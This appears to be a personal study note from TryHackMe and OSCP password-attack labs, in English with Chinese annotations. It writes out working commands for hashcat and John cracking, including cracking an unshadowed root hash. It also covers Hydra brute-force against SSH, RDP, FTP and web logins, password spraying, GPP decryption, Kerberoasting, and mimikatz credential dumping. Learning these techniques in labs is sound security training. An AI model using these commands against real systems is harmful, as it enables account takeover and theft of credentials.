Password Cracking vs. Password Guessing

Password guessing: a technique used to target online protocols and services. Therefore, it's considered time-consuming and opens up the opportunity to generate logs for the failed login attempts. A password guessing attack conducted on a web-based system often requires a new request to be sent for each attempt, which can be easily detected. It may cause an account to be locked out if the system is designed and configured securely.
Password cracking: a technique performed locally or on systems controlled by the attacker.

Default Passwords

https://cirt.net/passwords https://default-password.info/ https://datarecovery.com/rd/default-passwords/

Weak Passwords

https://wiki.skullsecurity.org/index.php?title=Passwords - This includes the most well-known collections of passwords. SecLists - A huge collection of all kinds of lists, not only for password cracking.

Leaked Passwords

The following are some of the common password lists that have weak and leaked passwords, including webhost, elitehacker,hak5, Hotmail, PhpBB companies' leaks: SecLists/Passwords/Leaked-Databases

Combined wordlists

cat file1.txt file2.txt file3.txt > combined_list.txt

sort combined_list.txt | uniq -u > cleaned_combined_list.txt

Customized Wordlists

cewl -w list.txt -d 5 -m 5 http://thm.labs

-w will write the contents to a file. In this case, list.txt.
-m 5 gathers strings (words) that are 5 characters or more
-d 5 is the depth level of web crawling/spidering (default 2)
http://thm.labs is the URL that will be used

Username Wordlists

username_generator: could help create a list with most of the possible combinations if we have a first name and last name.

git clone https://github.com/therodri2/username_generator.git

python3 username_generator.py -h  ---> shows the tool's help message and optional arguments.

echo "John Smith" > users.lst
python3 username_generator.py -w users.lst  --> to generate the possible combinations of the given full name.

Keyspace Technique

crunch tool

crunch is one of many powerful tools for creating an offline wordlist. With crunch, we can specify numerous options, including min, max, and options. The following example creates a wordlist containing all possible combinations of 2 characters, including 0-4 and a-d. We can use the -o argument and specify a file to save the output to. crunch 2 2 01234abcd -o crunch.txt

crunch also lets us specify a character set using the -t option to combine words of our choice. Here are some of the other options that could be used to help create different combinations of your choice:

@ - lower case alpha characters
, - upper case alpha characters
% - numeric characters
^ - special characters including space

For example, if part of the password is known to us, and we know it starts with pass and follows two numbers, we can use the % symbol from above to match the numbers. Here we generate a wordlist that contains pass followed by 2 numbers: crunch 6 6 -t pass%%

CUPP - Common User Passwords Profiler

git clone https://github.com/Mebus/cupp.git
python3 cupp.py ---> see the available options
python3 cupp.py -i  --> interactive mode
python3 cupp.py -l  --> download Pre-created wordlists
python3 cupp.py -a --> provide default usernames and passwords from the Alecto database

Offline Attacks -- Dictionary attack

hashid or hash-identifier

hashid or hash-identifier: to identify the type of hash https://www.kali.org/tools/hashid/

hashid '$2y$10$XrrpX8RD6IFvBwtzPuTlcOqJ8kO2px2xsh17f60GZsBKLeszsQTBC' Note: 对于存在特殊字符，用单引号。 不能用双引号

In Bash and zsh, single quotes (') and double quotes (") have different meanings. 
[Single quotes preserve the literal value of all characters within the quotes, 
while double quotes allow for variable substitution, command substitution, 
and interpretation of certain escape sequences ]
[For example, if you have a variable x=5, then echo '$x' will print $x, whereas echo "$x" will print 5 ]

hashcat

hashcat' rule: https://hashcat.net/wiki/doku.php?id=rule_based_attack

hashcat and rule (from OSCP)

kali@kali:~/passwordattacks$ echo "\$1 c" > demo.rule

kali@kali:~/passwordattacks$ cat demo1.rule     
$1 c

kali@kali:~/passwordattacks$ hashcat -r demo1.rule --stdout demo.txt
Password1
Iloveyou1
Princess1
Rockyou1
Abc1231

kali@kali:~/passwordattacks$ cat demo2.rule   
$1
c

kali@kali:~/passwordattacks$ hashcat -r demo2.rule --stdout demo.txt
password1
Password
iloveyou1
Iloveyou
princess1
Princess
...

kali@kali:~/passwordattacks$ cat demo1.rule     
$1 c $!

kali@kali:~/passwordattacks$ hashcat -r demo1.rule --stdout demo.txt
Password1!
Iloveyou1!
Princess1!
Rockyou1!
Abc1231!

kali@kali:~/passwordattacks$ cat demo2.rule   
$! $1 c

kali@kali:~/passwordattacks$ hashcat -r demo2.rule --stdout demo.txt
Password!1
Iloveyou!1
Princess!1
Rockyou!1
Abc123!1

rule-base attack by hashcat (OSCP)

kali@kali:~/passwordattacks$ cat crackme.txt     
f621b6c9eab51a3e2f4e167fee4c6860

kali@kali:~/passwordattacks$ cat demo3.rule   
$1 c $!
$2 c $!
$1 $2 $3 c $!

kali@kali:~/passwordattacks$ hashcat -m 0 crackme.txt /usr/share/wordlists/rockyou.txt -r demo3.rule --force

rule files of hashcat

ls -la /usr/share/hashcat/rules/

hashcat: crash a hash (THM)

hashcat -a 0 -m 0 f806fc5a2a0d5ba2471600758452799c /usr/share/wordlists/rockyou.txt

-a 0  sets the attack mode to a dictionary attack
-m 0  sets the hash mode for cracking MD5 hashes; for other types, run hashcat -h for a list of supported hashes.
f806fc5a2a0d5ba2471600758452799c this option could be a single hash like our example or a file that contains a hash or multiple hashes.
/usr/share/wordlists/rockyou.txt the wordlist/dictionary file for our attack
We run hashcat with --show option to show the cracked value if the hash has been cracked:
hashcat -a 0 -m 0 F806FC5A2A0D5BA2471600758452799C /usr/share/wordlists/rockyou.txt --show

Brute-Force attack by hashcat (THM)

hashcat -a 3 -m 0 05A5CF06982BA7892ED2A6D38FE832D6 ?d?d?d?d
05a5cf06982ba7892ed2a6d38fe832d6:2021
-a 3  sets the attacking mode as a brute-force attack
?d?d?d?d the ?d tells hashcat to use a digit. In our case, ?d?d?d?d for four digits starting with 0000 and ending at 9999
其他
--stdout print the result to the terminal

John

Brute-force attack for hash by John

If you are using Kali, you can find it at /usr/share/wordlists/rockyou.txt. We will also have a crack.txt file with just the password hash. edba955d0ea15fdef4f61726ef97e5af507430c0 then, run:

john --wordlist=/usr/share/wordlists/rockyou.txt --format=raw-md5 crack.txt
john --wordlist=/usr/share/wordlists/rockyou.txt --format=phpass crack.txt

Rule-Based attacks by John.

Rule-Based attacks are also known as hybrid attacks. Rule-Based attacks assume the attacker knows something about the password policy.

Read /etc/john/john.conf and look for List.Rules to see all the available rules: cat /etc/john/john.conf|grep "List.Rules:" | cut -d"." -f3 | cut -d":" -f2 | cut -d"]" -f1 | awk NF Case: We will create a wordlist with only one password containing the string tryhackme by using rule

john --wordlist=/tmp/single-password-list.txt --rules=best64 --stdout | wc -l
john --wordlist=single-password-list.txt --rules=KoreLogic --stdout |grep "Tryh@ckm3"

Custom Rules

We can add our rule to the end of john.conf:

user@machine$ sudo vi /etc/john/john.conf 
[List.Rules:THM-Password-Attacks] 
Az"[0-9]" ^[!@#$]

说明：
[List.Rules:THM-Password-Attacks]  specify the rule name THM-Password-Attacks.
Az represents a single word from the original wordlist/dictionary using -p.
"[0-9]" append a single digit (from 0 to 9) to the end of the word. For two digits, we can add "[0-9][0-9]"  and so on.  
^[!@#$] add a special character at the beginning of each word. ^ means the beginning of the line/word. Note, changing ^ to $ will append the special characters to the end of the line/word.

Now let's create a file containing a single word password to see how we can expand our wordlist using this rule. echo "password" > /tmp/single.lst Use the customized rule

user@machine$ john --wordlist=/tmp/single.lst --rules=THM-Password-Attacks --stdout 
Using default input encoding: UTF-8 
!password0 
@password0 
#password0 
$password0

输出为新的wordlist文件
john --wordlist=/tmp/single.lst --rules=THM-Password-Attacks --stdout > new_wordlist.lst

"No password hashes left to crack (see FAQ）" 【⚠️】

https://www.openwall.com/john/doc/FAQ.shtml All of the password hashes found in the file (that are of the same type as the very first recognized hash in the file unless you're using the "--format=..." option) might be already cracked by previous invocations of John. To display cracked passwords, use "john --show" on your password hash file(s). john --show crack.txt To force John to crack those same hashes again, remove the john.pot file.

Crack shadow hash using John

┌──(kali㉿kali)-[~/Downloads]
└─$ cat passwd.txt
root:x:0:0:root:/root:/bin/bash

┌──(kali㉿kali)-[~/Downloads]
└─$ cat shadow.txt
root:$6$riekpK4m$uBdaAyK0j9WfMzvcSKYVfyEHGtBfnfpiVbYbzbVmfbneEbo0wSijW1GQussvJSk8X1M56kzgGj8f7DFN1h4dy1:18226:0:99999:7:::

└─$ unshadow passwd.txt shadow.txt > unshadowed.txt                

┌──(kali㉿kali)-[~/Downloads]
└─$ cat unshadowed.txt
root:$6$riekpK4m$uBdaAyK0j9WfMzvcSKYVfyEHGtBfnfpiVbYbzbVmfbneEbo0wSijW1GQussvJSk8X1M56kzgGj8f7DFN1h4dy1:0:0:root:/root:/bin/bash

┌──(kali㉿kali)-[~/Downloads]
└─$ john --format=crypt --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt

--->

Note！！:

if you meet an error msg as 'no password hashes loaded (see FAQ)' \ you can try to add '--format=crypt‘ ： john --format=crypt --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt https://superuser.com/questions/1684358/john-the-ripper-on-kali-linux-it-outputs-no-password-hashes-loaded

remove .pot and .log

remove .pot and .log files and then try again. rm .john/john.pot rm .john/john.log

Online password attacks

Hydra

Hydra supports an extensive list of network services to attack. Using hydra, we'll brute-force network services such as web login pages, FTP, SMTP, and SSH in this section.

//FTP
hydra -L userlist.txt -P passwordlist.txt 192.168.0.107 ftp -->非常耗时，不建议
hydra -l <ftpuser> -P passwordlist.txt 192.168.0.107 ftp

//SMTP
hydra -l email@company.xyz -P /path/to/wordlist.txt smtp://10.10.x.x -v 

//SSH
hydra -L users.lst -P /path/to/wordlist.txt ssh://10.10.x.x -v

// OSCP example for SSH
hydra -l george -P /usr/share/wordlists/rockyou.txt -s 2222 ssh://192.168.50.201
## -s: port
## -l: LOGIN. login with LOGIN name.

// OSCP example for RDP
已知password但是不知道username的case：
hydra -L /usr/share/wordlists/dirb/others/names.txt -p "SuperS3cure1337#" rdp://192.168.50.202

//Login page
hydra -l admin -P 500-worst-passwords.txt 10.10.x.x http-get-form "/login-get/index.php:username=^USER^&password=^PASS^:S=logout.php" -f 
或者
hydra -l admin -P 500-worst-passwords.txt 10.10.x.x http-get-form "/login-get/index.php:username=^USER^&password=^PASS^:S=logout.php" -t 32 -f -vV

（from OSCP）
hydra -l user -P /usr/share/wordlists/rockyou.txt 192.168.50.201 http-post-form "/index.php:fm_usr=user&fm_pwd=^PASS^:Login failed. Invalid"
Note：‘Login failed. Invalid’ 是login失败时在页面上显示的文言

（from OSCP）对于如下图的Basic auth的网页

hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.250.201 http-get

Lession:

hydra的命令里可以加上类似于 “-t 32” 的option让速度更快些

login网页的case:

试着在网页里username和password文本框里随意输入，在网页URL里发现它会发GET query到“/login-get/index.php? username=xxx&password=xxx”, 所以尝试使用hydra： hydra -l phillips -P clinic.lst 10.10.236.3 http-get-form "/login-get/index.php:username=^USER^&password=^PASS^:S=logout.php" -f

Note⚠️：如果Login的request是POST请求，则上面的命令要变成用 http-post-form

Password spray attack

场景：知道密码（比如初始密码）和一组username For example, an attacker will use one password (say, Secure@123) against many different accounts on the application to avoid account lockouts that would normally occur when brute forcing a single account with many passwords.

SSH

hydra -L usernames-list.txt -p Spring2021 ssh://10.1.1.10

RDP

python3 RDPassSpray.py -u victim -p Spring2021! -t 10.100.10.240:3026

Outlook web access (OWA) portal

SprayingToolkit (atomizer.py)
MailSniper

SMB

Tool: Metasploit (auxiliary/scanner/smb/smb_login)

关于GPP密码的破解

Historically, system administrators often changed local workstation passwords through Group Policy Preferences (GPP). However, even though GPP-stored passwords are encrypted with AES-256, the private key for the encryption has been posted on MSDN.We can use this key to decrypt these encrypted passwords. In this case, we'll use the gpp-decrypt ruby script in Kali Linux that decrypts a given GPP encrypted string:

kali@kali:~$ gpp-decrypt "+bsY0V3d4/KgX3VJdO/vyepPfAN1zMFTiQDApgR92JE"
P@$$w0rd

good hash crack webpage:

https://crackstation.net/

hashcat mode

Atlassian hash

The Hashcat mode number for Atlassian (PBKDF2-HMAC-SHA1) hashes is 12001, hashcat -m 12001 hashes.txt /usr/share/wordlists/fasttrack.txt

AS-REP Roasting

Do not require Kerberos preauthentication is enabled

impacket-GetNPUsers -dc-ip 192.168.50.70 -request -outputfile hashes.asreproast corp.com/pete
hashcat -m 18200 <hashfile> <Wordlists> -r <rule> --force

Kerberoasting

.\Rubeus.exe kerberoast /outfile:hashes.kerberoast
hashcat -m 13100 <hashfile> <Wordlists> -r <rule> --force

mimikatz

privilege::debug
sekurlsa::logonpasswords
lsadump::dcsync /user:<Domain\<TargetUsername>
hashcat -m 1000 <hashfile> <Wordlists> -r <rule> --force

WDavid404 / Note_tryhackme

Password Attacks #6